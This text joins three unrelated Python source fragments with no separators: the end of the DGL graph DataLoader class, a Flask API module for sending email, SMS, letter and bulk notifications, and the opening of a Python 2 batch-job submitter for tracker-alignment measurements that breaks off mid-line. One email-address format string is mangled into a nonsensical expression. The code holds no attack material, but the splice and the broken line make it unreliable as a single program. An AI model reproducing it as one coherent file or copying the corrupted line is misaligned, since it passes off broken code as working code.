and directly initialize # the new DataLoader from kwargs without any changes. if isinstance(kwargs.get('collate_fn', None), CollateWrapper): assert batch_size is None # must be None # restore attributes self.graph = graph self.indices = indices self.graph_sampler = graph_sampler self.device = device self.use_ddp = use_ddp self.ddp_seed = ddp_seed self.shuffle = shuffle self.drop_last = drop_last self.use_prefetch_thread = use_prefetch_thread self.use_alternate_streams = use_alternate_streams self.pin_prefetcher = pin_prefetcher self.use_uva = use_uva kwargs['batch_size'] = None super().__init__(**kwargs) return if isinstance(graph, DistGraph): raise TypeError( 'Please use dgl.dataloading.DistNodeDataLoader or ' 'dgl.datalaoding.DistEdgeDataLoader for DistGraphs.') # (BarclayII) I hoped that pin_prefetcher can be merged into PyTorch's native # pin_memory argument. But our neighbor samplers and subgraph samplers # return indices, which could be CUDA tensors (e.g. during UVA sampling) # hence cannot be pinned. PyTorch's native pin memory thread does not ignore # CUDA tensors when pinning and will crash. To enable pin memory for prefetching # features and disable pin memory for sampler's return value, I had to use # a different argument. Of course I could change the meaning of pin_memory # to pinning prefetched features and disable pin memory for sampler's returns # no matter what, but I doubt if it's reasonable. self.graph = graph self.indices = indices # For PyTorch-Lightning num_workers = kwargs.get('num_workers', 0) indices_device = None try: if isinstance(indices, Mapping): indices = {k: (torch.tensor(v) if not torch.is_tensor(v) else v) for k, v in indices.items()} indices_device = next(iter(indices.values())).device else: indices = torch.tensor(indices) if not torch.is_tensor(indices) else indices indices_device = indices.device except: # pylint: disable=bare-except # ignore when it fails to convert to torch Tensors. pass if indices_device is None: if not hasattr(indices, 'device'): raise AttributeError('Custom indices dataset requires a \"device\" \ attribute indicating where the indices is.') indices_device = indices.device if device is None: if use_uva: device = torch.cuda.current_device() else: device = self.graph.device self.device = _get_device(device) # Sanity check - we only check for DGLGraphs. if isinstance(self.graph, DGLHeteroGraph): # Check graph and indices device as well as num_workers if use_uva: if self.graph.device.type != 'cpu': raise ValueError('Graph must be on CPU if UVA sampling is enabled.') if num_workers > 0: raise ValueError('num_workers must be 0 if UVA sampling is enabled.') # Create all the formats and pin the features - custom GraphStorages # will need to do that themselves. self.graph.create_formats_() self.graph.pin_memory_() else: if self.graph.device != indices_device: raise ValueError( 'Expect graph and indices to be on the same device. ' 'If you wish to use UVA sampling, please set use_uva=True.') if self.graph.device.type == 'cuda' and num_workers > 0: raise ValueError('num_workers must be 0 if graph and indices are on CUDA.') if self.graph.device.type == 'cpu' and num_workers > 0: # Instantiate all the formats if the number of workers is greater than 0. self.graph.create_formats_() # Check pin_prefetcher and use_prefetch_thread - should be only effective # if performing CPU sampling but output device is CUDA if self.device.type == 'cuda' and self.graph.device.type == 'cpu' and not use_uva: if pin_prefetcher is None: pin_prefetcher = True if use_prefetch_thread is None: use_prefetch_thread = True else: if pin_prefetcher is True: raise ValueError( 'pin_prefetcher=True is only effective when device=cuda and ' 'sampling is performed on CPU.') if pin_prefetcher is None: pin_prefetcher = False if use_prefetch_thread is True: raise ValueError( 'use_prefetch_thread=True is only effective when device=cuda and ' 'sampling is performed on CPU.') if use_prefetch_thread is None: use_prefetch_thread = False # Check use_alternate_streams if use_alternate_streams is None: use_alternate_streams = ( self.device.type == 'cuda' and self.graph.device.type == 'cpu' and not use_uva) if (torch.is_tensor(indices) or ( isinstance(indices, Mapping) and all(torch.is_tensor(v) for v in indices.values()))): self.dataset = create_tensorized_dataset( indices, batch_size, drop_last, use_ddp, ddp_seed) else: self.dataset = indices self.ddp_seed = ddp_seed self.use_ddp = use_ddp self.use_uva = use_uva self.shuffle = shuffle self.drop_last = drop_last self.graph_sampler = graph_sampler self.use_alternate_streams = use_alternate_streams self.pin_prefetcher = pin_prefetcher self.use_prefetch_thread = use_prefetch_thread worker_init_fn = WorkerInitWrapper(kwargs.get('worker_init_fn', None)) self.other_storages = {} if use_cpu_worker_affinity: nw_work = kwargs.get('num_workers', 0) if cpu_worker_affinity_cores is None: cpu_worker_affinity_cores = [] if not isinstance(cpu_worker_affinity_cores, list): raise Exception('ERROR: cpu_worker_affinity_cores should be a list of cores') if not nw_work > 0: raise Exception('ERROR: affinity should be used with --num_workers=X') if len(cpu_worker_affinity_cores) not in [0, nw_work]: raise Exception('ERROR: cpu_affinity incorrect ' 'settings for cores={} num_workers={}' .format(cpu_worker_affinity_cores, nw_work)) self.cpu_cores = (cpu_worker_affinity_cores if len(cpu_worker_affinity_cores) else range(0, nw_work)) worker_init_fn = WorkerInitWrapper(self.worker_init_function) super().__init__( self.dataset, collate_fn=CollateWrapper( self.graph_sampler.sample, graph, self.use_uva, self.device), batch_size=None, worker_init_fn=worker_init_fn, **kwargs) def __iter__(self): if self.shuffle: self.dataset.shuffle() # When using multiprocessing PyTorch sometimes set the number of PyTorch threads to 1 # when spawning new Python threads. This drastically slows down pinning features. num_threads = torch.get_num_threads() if self.num_workers > 0 else None return _PrefetchingIter( self, super().__iter__(), use_thread=self.use_prefetch_thread, use_alternate_streams=self.use_alternate_streams, num_threads=num_threads) def worker_init_function(self, worker_id): """Worker init default function. Parameters ---------- worker_id : int Worker ID. """ try: psutil.Process().cpu_affinity([self.cpu_cores[worker_id]]) print('CPU-affinity worker {} has been assigned to core={}' .format(worker_id, self.cpu_cores[worker_id])) except: raise Exception('ERROR: cannot use affinity id={} cpu_cores={}' .format(worker_id, self.cpu_cores)) # To allow data other than node/edge data to be prefetched. def attach_data(self, name, data): """Add a data other than node and edge features for prefetching.""" self.other_storages[name] = wrap_storage(data) # Alias class NodeDataLoader(DataLoader): """(DEPRECATED) Sampled graph data loader over a set of nodes. .. deprecated:: 0.8 The class is deprecated since v0.8, replaced by :class:`~dgl.dataloading.DataLoader`. """ class EdgeDataLoader(DataLoader): """(DEPRECATED) Sampled graph data loader over a set of edges. .. deprecated:: 0.8 The class is deprecated since v0.8 -- its function has been covered by :class:`~dgl.dataloading.DataLoader` and :func:`~dgl.as_edge_prediction_sampler`. To migrate, change the legacy usage like: .. code:: python sampler = dgl.dataloading.MultiLayerNeighborSampler([15, 10, 5]) dataloader = dgl.dataloading.EdgeDataLoader( g, train_eid, sampler, exclude='reverse_id', reverse_eids=reverse_eids, negative_sampler=dgl.dataloading.negative_sampler.Uniform(5), batch_size=1024, shuffle=True, drop_last=False, num_workers=4) to: .. code:: python sampler = dgl.dataloading.MultiLayerNeighborSampler([15, 10, 5]) sampler = dgl.dataloading.as_edge_prediction_sampler( sampler, exclude='reverse_id', reverse_eids=reverse_eids, negative_sampler=dgl.dataloading.negative_sampler.Uniform(5)) dataloader = dgl.dataloading.DataLoader( g, train_eid, sampler, batch_size=1024, shuffle=True, drop_last=False, num_workers=4) """ def __init__(self, graph, indices, graph_sampler, device=None, use_ddp=False, ddp_seed=0, batch_size=1, drop_last=False, shuffle=False, use_prefetch_thread=False, use_alternate_streams=True, pin_prefetcher=False, exclude=None, reverse_eids=None, reverse_etypes=None, negative_sampler=None, use_uva=False, **kwargs): if device is None: if use_uva: device = torch.cuda.current_device() else: device = self.graph.device device = _get_device(device) if isinstance(graph_sampler, BlockSampler): dgl_warning( 'EdgeDataLoader directly taking a BlockSampler will be deprecated ' 'and it will not support feature prefetching. ' 'Please use dgl.dataloading.as_edge_prediction_sampler to wrap it.') if reverse_eids is not None: if use_uva: reverse_eids = recursive_apply(reverse_eids, lambda x: x.to(device)) else: reverse_eids_device = context_of(reverse_eids) indices_device = context_of(indices) if indices_device != reverse_eids_device: raise ValueError('Expect the same device for indices and reverse_eids') graph_sampler = as_edge_prediction_sampler( graph_sampler, exclude=exclude, reverse_eids=reverse_eids, reverse_etypes=reverse_etypes, negative_sampler=negative_sampler) super().__init__( graph, indices, graph_sampler, device=device, use_ddp=use_ddp, ddp_seed=ddp_seed, batch_size=batch_size, drop_last=drop_last, shuffle=shuffle, use_prefetch_thread=use_prefetch_thread, use_alternate_streams=use_alternate_streams, pin_prefetcher=pin_prefetcher, use_uva=use_uva, **kwargs) ######## Graph DataLoaders ######## # GraphDataLoader loads a set of graphs so it's not relevant to the above. They
import base64 import csv import functools import uuid from io import StringIO import werkzeug from flask import abort, current_app, jsonify, request from notifications_utils.recipients import ( RecipientCSV, try_validate_and_format_phone_number, ) from app import ( api_user, authenticated_service, create_uuid, document_download_client, encryption, notify_celery, statsd_client, ) from app.aws.s3 import upload_job_to_s3 from app.celery.letters_pdf_tasks import create_letters_pdf, process_virus_scan_passed from app.celery.research_mode_tasks import create_fake_letter_response_file from app.celery.tasks import process_job, save_email, save_sms from app.clients.document_download import DocumentDownloadError from app.config import QueueNames, TaskNames from app.dao.jobs_dao import dao_create_job from app.dao.notifications_dao import update_notification_status_by_reference from app.dao.services_dao import fetch_todays_total_message_count from app.dao.templates_dao import get_precompiled_letter_template from app.letters.utils import upload_letter_pdf from app.models import ( EMAIL_TYPE, JOB_STATUS_PENDING, JOB_STATUS_SCHEDULED, KEY_TYPE_TEAM, KEY_TYPE_TEST, LETTER_TYPE, NOTIFICATION_CREATED, NOTIFICATION_DELIVERED, NOTIFICATION_PENDING_VIRUS_CHECK, NOTIFICATION_SENDING, SMS_TYPE, UPLOAD_DOCUMENT, Notification, ) from app.notifications.process_letter_notifications import create_letter_notification from app.notifications.process_notifications import ( persist_notification, persist_scheduled_notification, send_notification_to_queue, simulated_recipient, ) from app.notifications.validators import ( check_rate_limiting, check_service_can_schedule_notification, check_service_email_reply_to_id, check_service_has_permission, check_service_sms_sender_id, validate_and_format_recipient, validate_template, validate_template_exists, ) from app.schema_validation import validate from app.schemas import job_schema from app.service.utils import safelisted_members from app.v2.errors import BadRequestError from app.v2.notifications import v2_notification_blueprint from app.v2.notifications.create_response import ( create_post_email_response_from_notification, create_post_letter_response_from_notification, create_post_sms_response_from_notification, ) from app.v2.notifications.notification_schemas import ( post_bulk_request, post_email_request, post_letter_request, post_precompiled_letter_request, post_sms_request, ) @v2_notification_blueprint.route("/{}".format(LETTER_TYPE), methods=["POST"]) def post_precompiled_letter_notification(): if "content" not in (request.get_json() or {}): return post_notification(LETTER_TYPE) form = validate(request.get_json(), post_precompiled_letter_request) # Check permission to send letters check_service_has_permission(LETTER_TYPE, authenticated_service.permissions) check_rate_limiting(authenticated_service, api_user) template = get_precompiled_letter_template(authenticated_service.id) form["personalisation"] = {"address_line_1": form["reference"]} reply_to = get_reply_to_text(LETTER_TYPE, form, template) notification = process_letter_notification( letter_data=form, api_key=api_user, template=template, reply_to_text=reply_to, precompiled=True, ) resp = { "id": notification.id, "reference": notification.client_reference, "postage": notification.postage, } return jsonify(resp), 201 @v2_notification_blueprint.route("/bulk", methods=["POST"]) def post_bulk(): try: request_json = request.get_json() except werkzeug.exceptions.BadRequest as e: raise BadRequestError(message=f"Error decoding arguments: {e.description}", status_code=400) max_rows = current_app.config["CSV_MAX_ROWS"] form = validate(request_json, post_bulk_request(max_rows)) if len([source for source in [form.get("rows"), form.get("csv")] if source]) != 1: raise BadRequestError(message="You should specify either rows or csv", status_code=400) template = validate_template_exists(form["template_id"], authenticated_service) check_service_has_permission(template.template_type, authenticated_service.permissions) remaining_messages = authenticated_service.message_limit - fetch_todays_total_message_count(authenticated_service.id) form["validated_sender_id"] = validate_sender_id(template, form.get("reply_to_id")) try: if form.get("rows"): output = StringIO() writer = csv.writer(output) writer.writerows(form["rows"]) file_data = output.getvalue() else: file_data = form["csv"] recipient_csv = RecipientCSV( file_data, template_type=template.template_type, placeholders=template._as_utils_template().placeholders, max_rows=max_rows, safelist=safelisted_members(authenticated_service, api_user.key_type), remaining_messages=remaining_messages, ) except csv.Error as e: raise BadRequestError(message=f"Error converting to CSV: {str(e)}", status_code=400) check_for_csv_errors(recipient_csv, max_rows, remaining_messages) job = create_bulk_job(authenticated_service, api_user, template, form, recipient_csv) return jsonify(data=job_schema.dump(job).data), 201 @v2_notification_blueprint.route("/<notification_type>", methods=["POST"]) def post_notification(notification_type): try: request_json = request.get_json() except werkzeug.exceptions.BadRequest as e: raise BadRequestError( message="Error decoding arguments: {}".format(e.description), status_code=400, ) if notification_type == EMAIL_TYPE: form = validate(request_json, post_email_request) elif notification_type == SMS_TYPE: form = validate(request_json, post_sms_request) elif notification_type == LETTER_TYPE: form = validate(request_json, post_letter_request) else: abort(404) check_service_has_permission(notification_type, authenticated_service.permissions) scheduled_for = form.get("scheduled_for", None) check_service_can_schedule_notification(authenticated_service.permissions, scheduled_for) check_rate_limiting(authenticated_service, api_user) template, template_with_content = validate_template( form["template_id"], strip_keys_from_personalisation_if_send_attach(form.get("personalisation", {})), authenticated_service, notification_type, ) reply_to = get_reply_to_text(notification_type, form, template) if notification_type == LETTER_TYPE: notification = process_letter_notification( letter_data=form, api_key=api_user, template=template, reply_to_text=reply_to, ) else: notification = process_sms_or_email_notification( form=form, notification_type=notification_type, api_key=api_user, template=template, service=authenticated_service, reply_to_text=reply_to, ) template_with_content.values = notification.personalisation if notification_type == SMS_TYPE: create_resp_partial = functools.partial(create_post_sms_response_from_notification, from_number=reply_to) elif notification_type == EMAIL_TYPE: if authenticated_service.sending_domain is None or authenticated_service.sending_domain.strip() == "": sending_domain = current_app.config["NOTIFY_EMAIL_DOMAIN"] else: sending_domain = authenticated_service.sending_domain create_resp_partial = functools.partial( create_post_email_response_from_notification, subject=template_with_content.subject, email_from="{}<EMAIL>(authenticated_<EMAIL>, sending_domain), ) elif notification_type == LETTER_TYPE: create_resp_partial = functools.partial( create_post_letter_response_from_notification, subject=template_with_content.subject, ) resp = create_resp_partial( notification=notification, content=str(template_with_content), url_root=request.url_root, scheduled_for=scheduled_for, ) return jsonify(resp), 201 def process_sms_or_email_notification(*, form, notification_type, api_key, template, service, reply_to_text=None): form_send_to = form["email_address"] if notification_type == EMAIL_TYPE else form["phone_number"] send_to = validate_and_format_recipient( send_to=form_send_to, key_type=api_key.key_type, service=service, notification_type=notification_type, ) # Do not persist or send notification to the queue if it is a simulated recipient simulated = simulated_recipient(send_to, notification_type) personalisation = process_document_uploads(form.get("personalisation"), service, simulated, template.id) notification = { "id": create_uuid(), "template": str(template.id), "template_version": str(template.version), "to": form_send_to, "personalisation": personalisation, "simulated": simulated, "api_key": str(api_key.id), "key_type": str(api_key.key_type), "client_reference": form.get("reference", None), } encrypted_notification_data = encryption.encrypt(notification) scheduled_for = form.get("scheduled_for", None) if scheduled_for: notification = persist_notification( template_id=template.id, template_version=template.version, recipient=form_send_to, service=service, personalisation=personalisation, notification_type=notification_type, api_key_id=api_key.id, key_type=api_key.key_type, client_reference=form.get("reference", None), simulated=simulated, reply_to_text=reply_to_text, ) persist_scheduled_notification(notification.id, form["scheduled_for"]) elif current_app.config["FF_NOTIFICATION_CELERY_PERSISTENCE"] and not simulated: # depending on the type route to the appropriate save task if notification_type == EMAIL_TYPE: current_app.logger.info("calling save email task") save_email.apply_async( (authenticated_service.id, create_uuid(), encrypted_notification_data, None), queue=QueueNames.DATABASE if not authenticated_service.research_mode else QueueNames.RESEARCH_MODE, ) elif notification_type == SMS_TYPE: save_sms.apply_async( (authenticated_service.id, create_uuid(), encrypted_notification_data, None), queue=QueueNames.DATABASE if not authenticated_service.research_mode else QueueNames.RESEARCH_MODE, ) else: notification = persist_notification( template_id=template.id, template_version=template.version, recipient=form_send_to, service=service, personalisation=personalisation, notification_type=notification_type, api_key_id=api_key.id, key_type=api_key.key_type, client_reference=form.get("reference", None), simulated=simulated, reply_to_text=reply_to_text, ) if not simulated: send_notification_to_queue( notification=notification, research_mode=service.research_mode, queue=template.queue_to_use(), ) else: current_app.logger.debug("POST simulated notification for id: {}".format(notification.id)) if not isinstance(notification, Notification): notification["template_id"] = notification["template"] notification["api_key_id"] = notification["api_key"] notification["template_version"] = template.version notification["service"] = service notification["service_id"] = service.id notification["reply_to_text"] = reply_to_text del notification["template"] del notification["api_key"] del notification["simulated"] notification = Notification(**notification) return notification def process_document_uploads(personalisation_data, service, simulated, template_id): file_keys = [k for k, v in (personalisation_data or {}).items() if isinstance(v, dict) and "file" in v] if not file_keys: return personalisation_data personalisation_data = personalisation_data.copy() check_service_has_permission(UPLOAD_DOCUMENT, authenticated_service.permissions) for key in file_keys: if simulated: personalisation_data[key] = document_download_client.get_upload_url(service.id) + "/test-document" else: try: personalisation_data[key] = document_download_client.upload_document(service.id, personalisation_data[key]) except DocumentDownloadError as e: raise BadRequestError(message=e.message, status_code=e.status_code) if not simulated: save_stats_for_attachments( [v for k, v in personalisation_data.items() if k in file_keys], service.id, template_id, ) return personalisation_data def save_stats_for_attachments(files_data, service_id, template_id): nb_files = len(files_data) statsd_client.incr(f"attachments.nb-attachments.count-{nb_files}") statsd_client.incr("attachments.nb-attachments", count=nb_files) statsd_client.incr(f"attachments.services.{service_id}", count=nb_files) statsd_client.incr(f"attachments.templates.{template_id}", count=nb_files) for document in [f["document"] for f in files_data]: statsd_client.incr(f"attachments.sending-method.{document['sending_method']}") statsd_client.incr(f"attachments.file-type.{document['mime_type']}") # File size is in bytes, convert to whole megabytes nb_mb = document["file_size"] // (1_024 * 1_024) file_size_bucket = f"{nb_mb}-{nb_mb + 1}mb" statsd_client.incr(f"attachments.file-size.{file_size_bucket}") def process_letter_notification(*, letter_data, api_key, template, reply_to_text, precompiled=False): if api_key.key_type == KEY_TYPE_TEAM: raise BadRequestError(message="Cannot send letters with a team api key", status_code=403) if not api_key.service.research_mode and api_key.service.restricted and api_key.key_type != KEY_TYPE_TEST: raise BadRequestError(message="Cannot send letters when service is in trial mode", status_code=403) if precompiled: return process_precompiled_letter_notifications( letter_data=letter_data, api_key=api_key, template=template, reply_to_text=reply_to_text, ) test_key = api_key.key_type == KEY_TYPE_TEST # if we don't want to actually send the letter, then start it off in SENDING so we don't pick it up status = NOTIFICATION_CREATED if not test_key else NOTIFICATION_SENDING queue = QueueNames.CREATE_LETTERS_PDF if not test_key else QueueNames.RESEARCH_MODE notification = create_letter_notification( letter_data=letter_data, template=template, api_key=api_key, status=status, reply_to_text=reply_to_text, ) create_letters_pdf.apply_async([str(notification.id)], queue=queue) if test_key: if current_app.config["NOTIFY_ENVIRONMENT"] in ["preview", "development"]: create_fake_letter_response_file.apply_async((notification.reference,), queue=queue) else: update_notification_status_by_reference(notification.reference, NOTIFICATION_DELIVERED) return notification def process_precompiled_letter_notifications(*, letter_data, api_key, template, reply_to_text): try: status = NOTIFICATION_PENDING_VIRUS_CHECK letter_content = base64.b64decode(letter_data["content"]) except ValueError: raise BadRequestError( message="Cannot decode letter content (invalid base64 encoding)", status_code=400, ) notification = create_letter_notification( letter_data=letter_data, template=template, api_key=api_key, status=status, reply_to_text=reply_to_text, ) filename = upload_letter_pdf(notification, letter_content, precompiled=True) current_app.logger.info("Calling task scan-file for {}".format(filename)) # call task to add the filename to anti virus queue if current_app.config["ANTIVIRUS_ENABLED"]: notify_celery.send_task( name=TaskNames.SCAN_FILE, kwargs={"filename": filename}, queue=QueueNames.ANTIVIRUS, ) else: # stub out antivirus in dev process_virus_scan_passed.apply_async( kwargs={"filename": filename}, queue=QueueNames.LETTERS, ) return notification def validate_sender_id(template, reply_to_id): notification_type = template.template_type if notification_type == EMAIL_TYPE: service_email_reply_to_id = reply_to_id check_service_email_reply_to_id( str(authenticated_service.id), service_email_reply_to_id, notification_type, ) return service_email_reply_to_id elif notification_type == SMS_TYPE: service_sms_sender_id = reply_to_id check_service_sms_sender_id( str(authenticated_service.id), service_sms_sender_id, notification_type, ) return service_sms_sender_id else: raise NotImplementedError("validate_sender_id only handles emails and text messages") def get_reply_to_text(notification_type, form, template, form_field=None): reply_to = None if notification_type == EMAIL_TYPE: service_email_reply_to_id = form.get(form_field or "email_reply_to_id") reply_to = ( check_service_email_reply_to_id( str(authenticated_service.id), service_email_reply_to_id, notification_type, ) or template.get_reply_to_text() ) elif notification_type == SMS_TYPE: service_sms_sender_id = form.get(form_field or "sms_sender_id") sms_sender_id = check_service_sms_sender_id(str(authenticated_service.id), service_sms_sender_id, notification_type) if sms_sender_id: reply_to = try_validate_and_format_phone_number(sms_sender_id) else: reply_to = template.get_reply_to_text() elif notification_type == LETTER_TYPE: reply_to = template.get_reply_to_text() return reply_to def strip_keys_from_personalisation_if_send_attach(personalisation): return {k: v for (k, v) in personalisation.items() if not (type(v) is dict and v.get("sending_method") == "attach")} def check_for_csv_errors(recipient_csv, max_rows, remaining_messages): nb_rows = len(recipient_csv) if recipient_csv.has_errors: if recipient_csv.missing_column_headers: raise BadRequestError( message=f"Missing column headers: {', '.join(sorted(recipient_csv.missing_column_headers))}", status_code=400, ) if recipient_csv.duplicate_recipient_column_headers: raise BadRequestError( message=f"Duplicate column headers: {', '.join(sorted(recipient_csv.duplicate_recipient_column_headers))}", status_code=400, ) if recipient_csv.more_rows_than_can_send: raise BadRequestError( message=f"You only have {remaining_messages} remaining messages before you reach your daily limit. You've tried to send {nb_rows} messages.", status_code=400, ) if recipient_csv.too_many_rows: raise BadRequestError( message=f"Too many rows. Maximum number of rows allowed is {max_rows}", status_code=400, ) if not recipient_csv.allowed_to_send_to: if api_user.key_type == KEY_TYPE_TEAM: explanation = "because you used a team and safelist API key." if authenticated_service.restricted: explanation = ( "because your service is in trial mode. You can only send to members of your team and your safelist." ) raise BadRequestError( message=f"You cannot send to these recipients {explanation}", status_code=400, ) if recipient_csv.rows_with_errors: def row_error(row): content = [] for header in [header for header in recipient_csv.column_headers if row[header].error]: if row[header].recipient_error: content.append(f"`{header}`: invalid recipient") else: content.append(f"`{header}`: {row[header].error}") return f"Row {row.index} - {','.join(content)}" errors = ". ".join([row_error(row) for row in recipient_csv.initial_rows_with_errors]) raise BadRequestError( message=f"Some rows have errors. {errors}.", status_code=400, ) else: raise NotImplementedError("Got errors but code
from __future__ import print_function import ConfigParser import argparse import pickle import sys import os import subprocess import shutil import time pickle_name = "dump.pkl" # contains all the measurement objects in a list history_file = "history.log" clock_interval = 20 # in seconds STATE_NONE = -1 STATE_ITERATION_START=0 STATE_BJOBS_WAITING=1 STATE_BJOBS_DONE=2 STATE_BJOBS_FAILED=12 STATE_MERGE_WAITING=3 STATE_MERGE_DONE=4 STATE_MERGE_FAILED=14 STATE_SUMMARY_WAITING=5 STATE_SUMMARY_DONE=6 STATE_SUMMARY_FAILED=16 STATE_LOCAL_WAITING=7 STATE_LOCAL_DONE=8 STATE_LOCAL_FAILED=18 STATE_FINISHED=9 status_map = {} status_map[STATE_NONE] = "STATE_NONE" status_map[STATE_ITERATION_START] = "STATE_ITERATION_START" status_map[STATE_BJOBS_WAITING] = "STATE_BJOBS_WAITING" status_map[STATE_BJOBS_DONE] = "STATE_BJOBS_DONE" status_map[STATE_BJOBS_FAILED] = "STATE_BJOBS_FAILED" status_map[STATE_MERGE_WAITING] = "STATE_MERGE_WAITING" status_map[STATE_MERGE_DONE] = "STATE_MERGE_DONE" status_map[STATE_MERGE_FAILED] = "STATE_MERGE_FAILED" status_map[STATE_SUMMARY_WAITING] = "STATE_SUMMARY_WAITING" status_map[STATE_SUMMARY_DONE] = "STATE_SUMMARY_DONE" status_map[STATE_SUMMARY_FAILED] = "STATE_SUMMARY_FAILED" status_map[STATE_LOCAL_WAITING] = "STATE_LOCAL_WAITING" status_map[STATE_LOCAL_DONE] = "STATE_LOCAL_DONE" status_map[STATE_LOCAL_FAILED] = "STATE_LOCAL_FAILED" status_map[STATE_FINISHED] = "STATE_FINISHED" base = "" def ensurePathExists(path): import os import errno try: os.makedirs(path) except OSError as exception: if exception.errno != errno.EEXIST: raise def replaceAllRanges(string): if "[" in string and "]" in string: strings = [] posS = string.find("[") posE = string.find("]") nums = string[posS+1:posE].split(",") expression = string[posS:posE+1] nums = string[string.find("[")+1:string.find("]")] for interval in nums.split(","): interval = interval.strip() if "-" in interval: lowNum = int(interval.split("-")[0]) upNum = int(interval.split("-")[1]) for i in range(lowNum, upNum+1): newstring = string[0:posS]+str(i)+string[posE+1:] newstring = replaceAllRanges(newstring) strings += newstring else: newstring = string[0:posS]+interval+string[posE+1:] newstring = replaceAllRanges(newstring) strings += newstring return strings else: return [string,] def save(measurements): with open(pickle_name, "w") as saveFile: pickle.dump(measurements, saveFile) class Dataset: name = "" nFiles = 0 maxEvents = -1 baseDirectory = "" sampleType = "data1" fileList = [] conditions = [] def __init__(self, config, name): dsDict = dict(config.items("dataset:{}".format(name))) self.name = name self.baseDirectory = dsDict["baseDirectory"] self.fileList = [] names = dsDict["fileNames"].split(" ") for name in names: parsedNames = replaceAllRanges(name) for fileName in parsedNames: self.fileList.append(self.baseDirectory+"/"+fileName) self.nFiles = len(self.fileList) if dsDict.has_key("maxEvents"): self.maxEvents = dsDict["maxEvents"] if dsDict.has_key("isMC"): if dsDict["isMC"] == "True": self.sampleType = "MC" else: self.sampleType ="data1" self.conditions = [] for key, value in dsDict.items(): if key.startswith("condition"): record = key.split(" ")[1] connect, tag = value.split(" ") self.conditions.append({"record":record, "connect":connect, "tag":tag}) class Alignment: name = "" alignmentName = None baselineDir = "Design" globalTag = "None" isDesign = False hasAlignmentCondition = False conditions = [] def __init__(self, config, name): alDict = dict(config.items("alignment:{}".format(name))) self.name = name if alDict.has_key("alignmentName"): self.alignmentName = alDict["alignmentName"] if alDict.has_key("globalTag"): self.globalTag = alDict["globalTag"] if alDict.has_key("baselineDir"): self.baselineDir= alDict["baselineDir"] if alDict.has_key("isDesign"): self.isDesign= (alDict["isDesign"] == "True") self.hasAlignmentCondition = False # If this is true, no other Alignment-Object is loaded in apeEstimator_cfg.py using the alignmentName self.conditions = [] for key, value in alDict.items(): if key.startswith("condition"): record = key.split(" ")[1] connect, tag = value.split(" ") if record == "TrackerAlignmentRcd": self.hasAlignmentCondition = True self.conditions.append({"record":record, "connect":connect, "tag":tag}) # check if at least one of the two ways to define the alignment was used if self.alignmentName == None and not self.hasAlignmentCondition: print("Error: No alignment object name or record was defined for alignment {}".format(self.name)) sys.exit() class ApeMeasurement: name = "workingArea" curIteration = 0 firstIteration = 0 maxIterations = 15 status = STATE_NONE dataset = None alignment = None runningJobs = None failedJobs = None startTime = "" finishTime = "" def __init__(self, name, dataset, alignment, additionalOptions={}): self.name = name self.alignment = alignment self.dataset = dataset self.curIteration = 0 self.status = STATE_ITERATION_START self.runningJobs = [] self.failedJobs = [] self.startTime = subprocess.check_output(["date"]).strip() for key, value in additionalOptions.items(): setattr(self, key, value) print(key, value) self.firstIteration=int(self.firstIteration) self.maxIterations=int(self.maxIterations) self.curIteration = self.firstIteration if self.alignment.isDesign: self.maxIterations = 0 if self.alignment.isDesign and self.dataset.sampleType != "MC": # For now, this won't immediately shut down the program print("APE Measurement {} is scheduled to to an APE baseline measurement with a dataset that is not marked as isMC=True. Is this intended?".format(self.name)) ensurePathExists('{}/hists/{}'.format(base, self.name)) if not self.alignment.isDesign: ensurePathExists('{}/hists/{}/apeObjects'.format(base, self.name)) def get_status(self): return status_map[self.status] def print_status(self): print("APE Measurement {} in iteration {} is now in status {}".format(self.name, self.curIteration, self.get_status())) def submit_jobs(self): toSubmit = [] allConditions = self.alignment.conditions+self.dataset.conditions allConditions = list({v['record']:v for v in allConditions}.values()) # should we clean for duplicate records? the overlap record last defined (from dataset) # will be kept in case of overlap, which is the same as if there was no overlap removal # If conditions are made, create file to load them from conditionsFileName = "None" if len(allConditions) > 0: conditionsFileName = "{base}/python/conditions/conditions_{name}_iter{iterNo}_cff.py".format(base=base,name=self.name, iterNo=self.curIteration) rawFileName = "conditions_{name}_iter{iterNo}_cff".format(name=self.name, iterNo=self.curIteration) with open(conditionsFileName, "w") as fi: from autoSubmitterTemplates import conditionsFileHeader fi.write(conditionsFileHeader) from autoSubmitterTemplates import conditionsTemplate for condition in allConditions: fi.write(conditionsTemplate.format(record=condition["record"], connect=condition["connect"], tag=condition["tag"])) alignmentNameToUse = self.alignment.alignmentName if self.alignment.hasAlignmentCondition: alignmentNameToUse = "fromConditions" lastIter = (self.curIteration==self.maxIterations) and not self.alignment.isDesign # create a batch job file for each input file for i in range(self.dataset.nFiles): inputFile = self.dataset.fileList[i] inputCommands = "sample={sample} fileNumber={fileNo} iterNumber={iterNo} lastIter={lastIter} alignRcd={alignRcd} maxEvents={maxEvents} globalTag={globalTag} measurementName={name} conditions={conditions}".format(sample=self.dataset.sampleType,fileNo=i+1,iterNo=self.curIteration,lastIter=lastIter,alignRcd=alignmentNameToUse, maxEvents=self.dataset.maxEvents, globalTag=self.alignment.globalTag, name=self.name, conditions=rawFileName) fiName = "{}/test/autoSubmitter/workingArea/batchscript_{}_iter{}_{}".format(base, self.name,self.curIteration,i+1) with open(fiName+".tcsh", "w") as jobFile: from autoSubmitterTemplates import bjobTemplate jobFile.write(bjobTemplate.format(inputFile = inputFile, inputCommands=inputCommands)) toSubmit.append((fiName,i+1)) # submit all batch jobs submitName = "{}/test/autoSubmitter/workingArea/submit_{}_jobs_iter{}.sh".format(base, self.name, self.curIteration) with open(submitName,"w") as submitFile: for sub,number in toSubmit: from autoSubmitterTemplates import submitJobTemplate errorFile = sub+"_error.txt" outputFile = sub+"_output.txt" jobFile = sub+".tcsh" date = subprocess.check_output(["date", "+%m_%d_%H_%M_%S"]).strip() jobName = sub.split("/")[-1]+"_"+date self.runningJobs.append((jobName, number)) submitFile.write(submitJobTemplate.format(errorFile=errorFile, outputFile=outputFile, jobFile=jobFile, jobName=jobName)) submitFile.write("rm -- $0") subOut = subprocess.check_output("bash {}".format(submitName), shell=True).strip() if len(subOut) == 0: print("Running on environment that does not know bsub command or ssh session is timed out (ongoing for longer than 24h?), exiting") sys.exit() self.status = STATE_BJOBS_WAITING self.print_status() def check_jobs(self): lastStatus = self.status stillRunningJobs = [] # check all still running jobs for job, number in self.runningJobs: from autoSubmitterTemplates import checkJobTemplate checkString = checkJobTemplate.format(jobName=job) jobState = subprocess.check_output(checkString, shell=True).rstrip() if "DONE" in jobState: # Catch Exceptions that do not influence the job state but make the measurement fail anyway errFile = 